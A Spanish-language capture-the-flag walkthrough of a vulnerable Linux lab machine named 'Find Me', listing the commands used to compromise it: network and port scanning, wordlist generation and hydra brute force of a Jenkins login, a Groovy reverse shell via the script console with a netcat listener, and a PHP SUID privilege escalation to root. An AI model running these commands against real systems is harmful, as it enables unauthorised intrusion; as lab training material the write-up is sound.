Máquina: Find Me
SO: Linux
Dificultad: Facil
Descarga


img

1. Escando dispositivos activos en la red.

sudo arp-scan -I enp2s0 --localnet

img

2. Escaneado puertos y servicios activos de la maquina.

sudo nmap -p- --open -T5 -sCV --min-rate=5000 -n -Pn 192.168.1.7

img

3. Revisando la web, por el 80 corre la web apache por defecto y en el 8080 tenemos un panel login.

http://192.168.1.7:80

http://192.168.1.7:8080

img

4. Me conecto por ftp, encuentro un archivo, lo descargo para ver el contenido.

ftp 192.168.1.7

dir

get ayuda.txt

cat ayuda.txt

img img

5. Creando el diccionario para la contraseña.

crunch 5 5 -t p@@@a -o dict.txt

cat dict.txt

img

6. Haciendo fuerza bruta al login de jenkins.

hydra -l geralt -P dict.txt -f 192.168.1.7 -s 8080 http-get

img

7. Ya puedo acceder al jenkins.

img

8. Podemos hacer uso de la consola de jenkins, (Administrar jenkins-Script console).

img

9. Obteniendo un reverse shell, podemos usar revshell para generar codigo groovy.

9.1- Genero la revershe shell en groovy

img

9.2- Me pongo en escucha

sudo nc -nlvp 443

9.3- Me envio la shell y obtengo la conexion

img img

10. Veo que tenemos el usuario geralt, pruebo a migrar con la misma contraseña y si, se pudo.

cat /etc/passwd | grep sh

su geralt

img

11. Buscando binarios SUID, tenemos el php.

cd /home/geralt

find / -perm -4000 2>/dev/null

img

12. Escalando privilegios a root. gtfobins.

/usr/bin/php8.2 -r "pcntl_exec('/bin/bash', ['-p']);"

img


Finalizado.